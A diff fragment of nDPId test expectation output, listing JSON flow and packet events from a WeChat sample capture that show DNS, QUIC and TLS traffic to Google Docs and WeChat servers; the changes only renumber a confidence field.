-00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351026,"flow_last_seen":1492167351026,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167351026,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"docs.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351026,"flow_last_seen":1492167351026,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167351026,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"docs.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1492167351061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1492167351061,"pkt":"eJKcD6iO8IQvSpdgCABFoADVAABAAEARtMLAqAH+wKgBZwA12jYAwUoh3aeBgAABAAEABAAEBGRvY3MGZ29vZ2xlA2NvbQAAAQABwAwAAQABAAAA2QAE2DrGLsARAAIAAQACiyoABgNuczLAEcARAAIAAQACiyoABgNuczHAEcARAAIAAQACiyoABgNuczPAEcARAAIAAQACiyoABgNuczTAEcBPAAEAAQAFOEYABNjvIArAPQABAAEABS50AATY7yIKwGEAAQABAAUudAAE2O8kCsBzAAEAAQAFLnQABNjvJgo="} -00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1492167351061,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"docs.google.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.198.46"}} 
+00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1492167351061,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"docs.google.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.198.46"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351067,"flow_last_seen":1492167351067,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167351067,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02248{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1492167351067,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167351067,"pkt":"8IQvSpdgeJKcD6iOCABFAAVibQVAAEARaA3AqAFn2DrGLuD3AbsFTsxKDU3ZCrKMtFhpUTAzNQFnbJE8FVI6Xr9TUAWgAQAEQ0hMTx0AAABQQUQAIgEAAFNOSQAxAQAAU1RLAGsBAABWRVIAbwEAAENDUwB\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\/HO\/L6W7bp3Xhczs9ysCSmeki\/j96A7sEoRFEAE+SB65YLwp5s+42jMDuJu4lkMvUTAzNQHogWCSkhrofu2AhqIVgpFY8Kq3MDAwMDAwMDCSV1vE+gNbm7+W8XblWvpmJ\/49qGQAAABDQzIwQ2hyb21lLzU3LjAuMjk4Ny4xMzMgTGludXggeDg2XzY0Jc6XFWD7G7yXYXhVaoxdywAAAABYNTA5AAAQAAEAAAAeAAAAt6rwWAAAAADtcasM4uYqOdGcPkgWTuPinp6tSgmHbpcCw+LDtPZmZuBaJu0QIw4bgS6gnY4km2fVf4E4bxQZEQJVfGW2\/zkLZAAAAAEAAABDMjU1wgnkHLidnM3CCeQcuJ2czT2t9HxBefiRQAt7kKmueetXmAEAL+XPr519ndPJ3mPFBWs\/DigCPL0uG+UOo9PlVynP5lP7SYDz1bkGMXY1YNt3+9e\/xaovsHZwZUHeJNaLtZCflec\/IAM0fVlrvjwb6nbNCsXZz6\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"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351067,"flow_last_seen":1492167351067,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167351067,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"quic": {"client_requested_server_name":"docs.google.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} 
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351067,"flow_last_seen":1492167351067,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167351067,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"quic": {"client_requested_server_name":"docs.google.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} 01693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1492167351067,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":969,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":969,"pkt_l4_len":935,"thread_ts_msec":1492167351067,"pkt":"8IQvSpdgeJKcD6iOCABFAAO7bQZAAEARabPAqAFn2DrGLuD3AbsDp2YqDU3ZCrKMtFhpUTAzNQJxZNfHCC8u2f35luXQX7wk8+5+gy499Uo4Fg20rRdDDy5CsdXoRXrF+phU81nis1nRDRx09GXiKDxOppPR5wHoCPv6GGJ1a2aSeKMbWb+zwKTlNc+IgrbKFFqH047ViEQZsFLjifeqmjWw3kLjF9wuTO5xmTDc8NygVX92ZUjcWiRsZklVVPx3NbEThZxDUrne5HeS9hEKQhiWqsRNFsJ5ZewxcV+5cYvvBeYiQR+kS3f\/LZqZAjI6Q5gDCFVg4IVHBTbsdm3CNW6MkXX6Z21DpqBMIia1Z2wV8I9lmIjOLOKjoJcu+pem0sj3G6u1FBaJ6UzuToaeQVFoQV1B7THlLpcbWhfyxWuv5Vq5Nhbvz\/hy9e3GvHaPkX2Ap3unG8P22QcYcGd\/BWZtvoWlpacJDV2epOkkS7tt5wlFKOWfO8\/5Yu\/gJ5xuBFw7XGdmQknr+9LaS3e8wZiMR1ZfimH2Wrss8HcQEl9TcUi0OPt7hg4vPxA1umUMgAjxmP3GICQIJ8v3MSyfSe36zfbmMnzMFR+cZ4RVKOKFuZsig3U7Qla3oB3K2bziFfb7gRL+hERHc4YgKgGNFngj+oqw2jdkj\/RqXvOIZPBl74wKoDpJdAAu0pwpTpg0OYCvwu\/ep3j0WkfwnzYcwnEEOfrkyBT8sslKLByrPD6217xh62Bp0UxecAcjRSXYnXrLG4gF\/OklBRUl9MWf17862YoGJ6mbQ8Q1BCG\/ur1PzAt2\/FqJ05MHkwrkRV
SHl4pDeBaR66Du4ZmV0GBx989HTukTQy\/3OGUKXjAXhJdjcsLd1jo\/K0yDhk26WE7HHoqWgHvMgQjGE2RFzuX36OVzPCIEOwd9oe0YVvAfM\/rVc9genM5Hy7Sv8mutamuMH7bROMktPGAdZ\/IFx5w4VWad64HIS2eSUBLGRLvosHNSRrNdfupAMBGIyjJeytCFI+Ljtgl1sqegx6JwAaGxpjS+ZJjXdtHKXMd1GSxa\/aZjv\/gLSgGEeQHgpM0w997OPOSc\/oXhrMG2H9dPnVY0gxfZjD+EVSDAUqgCePMf4Xk+wruAsQ37\/lHXudBmH90ljRj8ye51wbrJXjVUKo39iLcU6hZ05\/StCBdO\/xPb895mMSP5JnWfCWFSaYGQN4FQQYatRm1PasNLHcHWO0PLezKCDM2gsmrDE3X\/KwGBhJhce2KxIu1Tjfe9ZeVoyy0Oxy0Bb7O\/93ta"} 02270{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1492167351121,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167351121,"pkt":"eJKcD6iO8IQvSpdgCABFoAViAABAADcR3XLYOsYuwKgBZwG74PcFTmzaBOou0Nigzud3ZaOudETm8GBczN7q3HxIUIOzVIoPsD73AQkDw5o48VPCPgxwE9bagOsfguW4BXFTqIT1IIV5ThjijbPacPMIeuYY+tLcR\/SESotUnfD6k31MBpngxATfGEoS3TSTc9aVt2BKPUkJNXTxIqajXh4z+2CjCT16kZiox8Qmel6o7NAeDdJDfOL+51L\/G92mnF40IupMo8kyn6Yeya9Ad1Q2D\/p2FAN4KbvETwnyCCrN\/3BzK6jhLgRMRUMpD76aZzYbZwTnnjn5cPWJgIaiNlEoyxA7CP6REtuotFUshn\/4\/Je7Jbm8GzbVpuThmCVdHsCKO9eQafmXETXyGPOX37U\/+RYvpidmrbPADR3IJ0YyPcE55eQPeQ3SLMLpJR+N0H26d91w3L3p89mtepH0NeIecXxbZcygXiO3ouImKiBH5Sols1nP6qAehqtyidEipR4ZPAV4Xw0h5rAYVjkhxL41hJnSJmoocaWAxV46W2QvJzsrabDi5M9SzvhRJAsPZZY4K6G5dvQpS2uzTzQOzxWkGBlQl7RRRgKZIcNK4yIcQD0yIGCwwoktA2Ld1Idk2Cu5os+Y7KXAeUWL4EghycwrRGckuLuUQjKt2wiWE8fO7O4\/Lv2VZCpq74PXu3G5CCkcU65VQJeeZrPt8UoeqowDQ+esOAIZ137WnNojv8+UsGDeg+xMKBRUrYaoT8ER8YifN6riDqUjipfNYkbEn8ucoDGqAIlyleAS5\/XHM13il1iRyxEOLilein7LTbUQNfwFOf8EzXgCnR+IpNR4wHUKNWXhmNPOYokIP23Sl\/FaC5yeTIvYRTQb\/x8mhYj\/WIs05PouLe9Pt+TRR3N2YyYcD4kqZDJk1bVFKuF7bqCGCM51z3lvURyUWHByifpl1Q0srxqBnb92qDujj+Ug5Hs9Ty\/kFB8qHvx1Dfq78jAeHz0fzz7AMlq+79RPkRIGLCbIkRGUTiiYKOqV8DW1cQsg\/KZWg+kdRSdfwb30mOCaUqILvOyhuHsdt\/VlQOncdoNcoPzCka952teJvpu3kHP0JF00GT6\/Qgv
MxqqvMT68gpqKr7VNH2JM4rMWfmQe7d70oO4rLXnu5+c5UkqU4+\/yoY+zdy1UMw3UYnE\/RB4x5v7QiQt4jRnCl6tLIdDw9lQg9IzEnVZzw2lt7lY+\/FC4dmux3GBahkU7C9wFjO9v95glXVXJsAYEhvS3wJvsdmH9ydK\/F3zD4bHe6QH8wln\/KtF+\/2hcmCsTO+QWhFCYnQytBu\/Dd7UqbnYMeu6CvYKHngUiBNqyzWOGJEUUIwiWru1HLQ+oi18IFAgJS2Pl99aG5LYQ83XtdOxJ4pO0nKlJ0xc1wx6vqc9D94XgPsJhPmRnKuyWzZTwOjFjJ4fG3PqBIeO52giJ97T6kI1ufnseC2DoOQ7mgmmkhk1xFPh\/iCEO2sH8\/yvC3ciJ3q1jHvS6trEx0psWwZhrcKMoj6uJQAqWOx\/4VMZblPtRO0JRK2sKrnR0AuXFvTgyJJXrSQnKCt4f0Ie08Z0FhokeNmZugGY11eoMg2b0Ohw1Gcl+Nco\/Mm0dOR0d0ZzowYYFQVn8Z1G5U0v2I0P+bjqBg\/Oft0VL\/uESmpcBS8+q9YYq03mdZfyrm0Wll6v2MrVZ+luVDiDPf+2zCNGMeJyqwXqCBY\/GUBtV\/ORVHwTg4O9+bDUiGoGMfoIrfv0WX52viV1sxsvodgKw\/K7R89paaPWnO6gRTKekrbX0nVKtcWseMnbmEds6efJmpuqUD3hZqUyUuRhdxz6a7pUXagTh"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167352068,"flow_last_seen":1492167352068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167352068,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -57,7 +57,7 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1492167352122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167352122,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0OfYAACsGqnlA6ae8wKgBZxRsjLFKrVv6utDMqYAQAWVTqwAAAQEICoWdcMgAL7Ej"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353674,"flow_last_seen":1492167353674,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1492167353674,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1492167353674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1492167353674,"pkt":"eJKcD6iO8IQvSpdgCABFoAD6dwRAACwGsNrLzZeiwKgBZwG70ypPgUs4IVggsIAYAQuBHwAAAQEICkXRpIYAMKn\/FwMDAMGOrZUQQd+ekzcfermPixMN7baWMlCLOjLGRLUay7A9ywN4ZUGmiUXDO1gdTDC98QU1t8eAbnyMFUBj5qM3d0y5XCUUPMCeBhhxcxN\/8G4Ch12FyipeyhGtwqgzXcsPc5ZQsJ\/Yfu\/XdVaAYYDYsfkQdrrVo9IGd6i0jIOj1GEXv+MuFcw5UP8MbQ5QLfOihRir7leYEOxmHGeDrisZkZBhOzKLL2Q5myihhKQJ9yeXWCsp\/s4j9ebB8kfX1kVSE8Aa"} 
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353674,"flow_last_seen":1492167353674,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1492167353674,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353674,"flow_last_seen":1492167353674,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1492167353674,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1492167353675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167353675,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0n8JAAEAGdYLAqAFny82XotMqAbshWCCwT4FL\/oAQAcj35wAAAQEICgAwuphF0aSG"} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoXgBAAEAGtx\/AqAFny82X058lAbtnDvSGeC5ApFARAOXT9QAA"} 
@@ -73,37 +73,37 @@ 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoK5BAAC4G+u\/LzZfTwKgBZwG7nyV4LkCkZw70h1ARAHPUZgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1492167354049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700mLgJvryODc86ASN8g1VAAAAgQFoAQCCApF8RJmADC6mwEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354049,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZmpAAEAGrtrAqAFny82XotNJAbvI4Nzzi4Cb7IAQAOWalAAAAQEICgAwuvZF8RJm"} -00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167354049,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167354049,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1492167354296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167354296,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG700oogx9AoQ\/Rp6ASN8hHnAAAAgQFoAQCCApF8RKkADC62gEDAwc="} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1492167354296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354296,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0a31AAEAGqcfAqAFny82XotNKAbuhD9GnKIMfQYAQAOWs3QAAAQEICgAwuzRF8RKk"} -00899{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353687,"flow_last_seen":1492167354430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167354430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":100,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353687,"flow_last_seen":1492167354487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167354487,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353937,"flow_last_seen":1492167355372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167355372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
